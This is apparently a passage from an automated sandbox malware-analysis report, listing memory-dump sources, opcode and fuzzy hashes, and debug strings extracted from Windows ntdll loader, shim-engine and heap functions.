                                                                      • Instruction ID: 8d71a17af5daf5dc7f92be082762de537c18053736789e31077806f2c37cd4a0
                                                                      • Opcode Fuzzy Hash: 562f820416e545cd4978cf58db21994c852881a141672afab503b0f36c23bb04
                                                                      • Instruction Fuzzy Hash: E6F0BEB5A11A458FDB168B18CA60F25B7B5EB827A0F1542A8EA244F5A2DB34D811CBC1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 81110e1cbab2af748f05e7ac53fffc0fae86c4eb8f4d5fd5c87c86c66638afad
                                                                      • Instruction ID: 5ab42f711da8c0d331be88ad34ff83eca3d6ba9d7f9b1a32d81bc509eea79920
                                                                      • Opcode Fuzzy Hash: 81110e1cbab2af748f05e7ac53fffc0fae86c4eb8f4d5fd5c87c86c66638afad
                                                                      • Instruction Fuzzy Hash: A790023170640012954071584994546500557E0301B61C416E1414514CDA24895A6762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f8f05fcd21e301ce97e3c8d288a8aafdc40578e2a48979c2018bd9233e80c9b
                                                                      • Instruction ID: 9789f4deca7b07e973c12a37a281c638dc27ebadbf78b272c350e165a524441d
                                                                      • Opcode Fuzzy Hash: 6f8f05fcd21e301ce97e3c8d288a8aafdc40578e2a48979c2018bd9233e80c9b
                                                                      • Instruction Fuzzy Hash: D390023130240402D5006158492470B100547D0302F61C416A2154515DD63588557972
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f27764d1674e769458b29813131e875f55c58addda08e45899dc4669115e4dbd
                                                                      • Instruction ID: bb258116a7efc7bbc2df6eb63fbf4ece1332e88b5dafbf3830f01461b79a5446
                                                                      • Opcode Fuzzy Hash: f27764d1674e769458b29813131e875f55c58addda08e45899dc4669115e4dbd
                                                                      • Instruction Fuzzy Hash: AB90047131300043D504715C4514707104547F1301F71C417F3144514CD53DCC757537
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5a5e6c2a74ba3d0391d3b62062409a7f5dbe4ec4ab12ae2dca3b7454de747068
                                                                      • Instruction ID: 37585b0f5e117df481ddc769ca19e803be3404641a120f91895ad7cb18f26ca9
                                                                      • Opcode Fuzzy Hash: 5a5e6c2a74ba3d0391d3b62062409a7f5dbe4ec4ab12ae2dca3b7454de747068
                                                                      • Instruction Fuzzy Hash: 029002317020004245407168895490650056BE1211761C526A1988510DD56988696A66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6a761914ca6d56b0530de5b3711601c82f6649f85f50e5f9219187e8cdbdd923
                                                                      • Instruction ID: da63a1f46c1f283e051fceae3e0e329c01312ac065fc16149a2fe04f5cabf28c
                                                                      • Opcode Fuzzy Hash: 6a761914ca6d56b0530de5b3711601c82f6649f85f50e5f9219187e8cdbdd923
                                                                      • Instruction Fuzzy Hash: DA90023130240402D50061584918747100547D0302F61C416A6154515ED675C8957932
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aaf5a85ddefe6147743c8e9167aee52dd321e13e2777ee47c0ad789044312560
                                                                      • Instruction ID: 5b490ba52e560017f895218656275fc68591b768b8bd77dff39ec955ad998428
                                                                      • Opcode Fuzzy Hash: aaf5a85ddefe6147743c8e9167aee52dd321e13e2777ee47c0ad789044312560
                                                                      • Instruction Fuzzy Hash: 3190027130240403D54065584914607100547D0302F61C416A3054515EDA398C557536
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5b854a290300dc57274fcbd9231b9194ac0b059411d39f902dfd673164803c54
                                                                      • Instruction ID: b9db97dade57f63e1a806febda9bc1f4fd0ec73c0618b58bcc14d03f87e2ebe5
                                                                      • Opcode Fuzzy Hash: 5b854a290300dc57274fcbd9231b9194ac0b059411d39f902dfd673164803c54
                                                                      • Instruction Fuzzy Hash: 3290027134200442D50061584524B06100587E1301F61C41AE2054514DD629CC567527
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: adce6c947f3fd9340b567197f0c971b93f894d16938c185ddd6ec0d72a0d30db
                                                                      • Instruction ID: 7facf24d700ac99388f885660d7661bb5cd504282670886c98aceb9d70b9115d
                                                                      • Opcode Fuzzy Hash: adce6c947f3fd9340b567197f0c971b93f894d16938c185ddd6ec0d72a0d30db
                                                                      • Instruction Fuzzy Hash: BC90023134200802D54071588524707100687D0601F61C416A1014514DD62689697AB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c2b907db9a59b1ad2ecd2b910091116140e72b3e8fb9583c8b59047c8972b333
                                                                      • Instruction ID: dab74ae60a18ae60db2808819bd82ae76dc3eb944ccaed745fa721b76e375c85
                                                                      • Opcode Fuzzy Hash: c2b907db9a59b1ad2ecd2b910091116140e72b3e8fb9583c8b59047c8972b333
                                                                      • Instruction Fuzzy Hash: 8390023130244442D54062584914B0F510547E1202FA1C41EA5146514CD92588596B22
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 07125a6a0a6f2a97ad6e31a45af3b1a6794f79830b3c668bd22bc5178425a114
                                                                      • Instruction ID: 41da35a041ec84c7c2dae9c51bc1d399f75f8248c4bad7bc0e18f46c78a7d21e
                                                                      • Opcode Fuzzy Hash: 07125a6a0a6f2a97ad6e31a45af3b1a6794f79830b3c668bd22bc5178425a114
                                                                      • Instruction Fuzzy Hash: ED90023131280042D60065684D24B07100547D0303F61C51AA1144514CD92588656922
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dbf6aeaf6b452172f649de534bcf92250842360717507c6660e2a49d56ccb6a0
                                                                      • Instruction ID: 429e193df4ab13471f8baa532cbc823e61edfafb40ea6f8393ccb622b2e7aeec
                                                                      • Opcode Fuzzy Hash: dbf6aeaf6b452172f649de534bcf92250842360717507c6660e2a49d56ccb6a0
                                                                      • Instruction Fuzzy Hash: 83900231343041525945B1584514507500657E02417A1C417A2404910CD536985AEA22
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 142e1dfff8ee0d99b1caffb2d044c811be5ec68aca5c1cceba8de10614a1545e
                                                                      • Instruction ID: cd1751345ff38da4056e9ec38fe42c61f67f34ff93b3d436e83f166dce2e4747
                                                                      • Opcode Fuzzy Hash: 142e1dfff8ee0d99b1caffb2d044c811be5ec68aca5c1cceba8de10614a1545e
                                                                      • Instruction Fuzzy Hash: 2990023134200402D54171584514606100957D0241FA1C417A1414514ED6658A5ABE62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c8f199e72e7cf91f78fc7f3422f28253aa512170e53c55a0e27ced3c4ec8cbc7
                                                                      • Instruction ID: 7523d5d11045e6228088d2d928d268ece25daaeec9c1eba520d8b066c67b8e8b
                                                                      • Opcode Fuzzy Hash: c8f199e72e7cf91f78fc7f3422f28253aa512170e53c55a0e27ced3c4ec8cbc7
                                                                      • Instruction Fuzzy Hash: A090023931300002D5807158551860A100547D1202FA1D81AA1005518CD925886D6722
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8ce03922672327800644fb4dbfffb26a6e3022941fd4c6fa7b68afdeb53bf7a6
                                                                      • Instruction ID: 4b96ad2d252ca65ec85a4d51f692afe33367c00d55af4ec3de9b846f052c084e
                                                                      • Opcode Fuzzy Hash: 8ce03922672327800644fb4dbfffb26a6e3022941fd4c6fa7b68afdeb53bf7a6
                                                                      • Instruction Fuzzy Hash: 1190043130704443D500755C551CF07100547D0305F71D417F3054555DD735CC55F533
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: HEAP:
                                                                      • API String ID: 3446177414-2466845122
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36B54460
                                                                      • ExecuteOptions, xrefs: 36B544AB
                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 36B5454D
                                                                      • Execute=1, xrefs: 36B5451E
                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36B54530
                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 36B54507
                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 36B54592
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                      • API String ID: 0-484625025
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 36B477DD, 36B47802
                                                                      • SsHd, xrefs: 36AFA304
                                                                      • Actx , xrefs: 36B47819, 36B47880
                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36B47807
                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36B477E2
                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 36B478F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                      • API String ID: 0-1988757188
                                                                      • Opcode ID: 51114384e3bd9614951587db19975918110df9748622dae363ed11c071d98984
                                                                      • Instruction ID: 48aa72945982067c19a9e960f436f7397568fb9a727f8c1c8f0bc5133610de09
                                                                      • Opcode Fuzzy Hash: 51114384e3bd9614951587db19975918110df9748622dae363ed11c071d98984
                                                                      • Instruction Fuzzy Hash: 46E1BF78A24311CFE711CE26CC8479AB7E1AB84758F504A2DFE55CF290DBB2D845CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 36B4914E, 36B49173
                                                                      • GsHd, xrefs: 36AFD794
                                                                      • Actx , xrefs: 36B49315
                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36B49178
                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 36B49372
                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36B49153
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                      • API String ID: 3446177414-2196497285
                                                                      • Opcode ID: 7ce46b64f87bf420ed91978fea487784d81a129c2734a6f283aad8135d0ca027
                                                                      • Instruction ID: a9bf1a28f734459c38e2315d82a20a22e47146054ff8ff6b55c405be8a42dc9d
                                                                      • Opcode Fuzzy Hash: 7ce46b64f87bf420ed91978fea487784d81a129c2734a6f283aad8135d0ca027
                                                                      • Instruction Fuzzy Hash: 92E1A074A183119FE712EF25CC80B4AB7E4BB89358F505A6DF9558F281DB32E844CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlDebugPrintTimes.NTDLL ref: 36AD651C
                                                                        • Part of subcall function 36AD6565: RtlDebugPrintTimes.NTDLL ref: 36AD6614
                                                                        • Part of subcall function 36AD6565: RtlDebugPrintTimes.NTDLL ref: 36AD665F
                                                                      Strings
                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 36B397B9
                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 36B3977C
                                                                      • LdrpInitShimEngine, xrefs: 36B39783, 36B39796, 36B397BF
                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 36B39790
                                                                      • apphelp.dll, xrefs: 36AD6446
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 36B397A0, 36B397C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 3446177414-204845295
                                                                      • Opcode ID: a374f13e3e9b9f0ea931b93e5de168b1f361acfab8b3c33e1627ee112961dd68
                                                                      • Instruction ID: acabc8ddf4db439111903f7f48f82e6cb8d9fe82294b058a1f4e9bb82885ad56
                                                                      • Opcode Fuzzy Hash: a374f13e3e9b9f0ea931b93e5de168b1f361acfab8b3c33e1627ee112961dd68
                                                                      • Instruction Fuzzy Hash: F151B071609300EFE310EF24CD60E5ABBE5FB84644F500919FA849B2A1EB34D945CF93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                      • API String ID: 3446177414-4227709934
                                                                      • Opcode ID: 3bab520920cc536fcbfa69efb69e3e92c611f0944ced91c29a631592b31ea633
                                                                      • Instruction ID: 9aa5f4e876868891d3b2fa254780668988a62e87a7ccd247327d357d0e148d58
                                                                      • Opcode Fuzzy Hash: 3bab520920cc536fcbfa69efb69e3e92c611f0944ced91c29a631592b31ea633
                                                                      • Instruction Fuzzy Hash: AA415DB9E01219ABDB01DF95C994ADEBBBAFF48354F110069EA04A7340D775DE01CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                      • API String ID: 3446177414-3492000579
                                                                      • Opcode ID: 87afe7dd8c80dc91f60b65653bc625fc92bcdd7bc40a3114ff1d9bcbfe0a6d1a
                                                                      • Instruction ID: 89d47b101ec4ed7ada3768f03b3ab3b9f9a0419019ddf866f953cd3bde8ba9d6
                                                                      • Opcode Fuzzy Hash: 87afe7dd8c80dc91f60b65653bc625fc92bcdd7bc40a3114ff1d9bcbfe0a6d1a
                                                                      • Instruction Fuzzy Hash: DB71E075901695EFCB01CFA8C8A0AADFBF6FF49394F048099E845AB251CB399941CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36B39885
                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36B39843
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 36B39854, 36B39895
                                                                      • LdrpLoadShimEngine, xrefs: 36B3984A, 36B3988B
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 3446177414-3589223738
                                                                      • Opcode ID: 09721a73ee258f42f3e1a9357298fa003c5efa88dd195762a475d64aa6b40dc1
                                                                      • Instruction ID: 7c348d434b845ca1d71c477a7a85105122816916ab85d7f2892f7fedd2cac1b9
                                                                      • Opcode Fuzzy Hash: 09721a73ee258f42f3e1a9357298fa003c5efa88dd195762a475d64aa6b40dc1
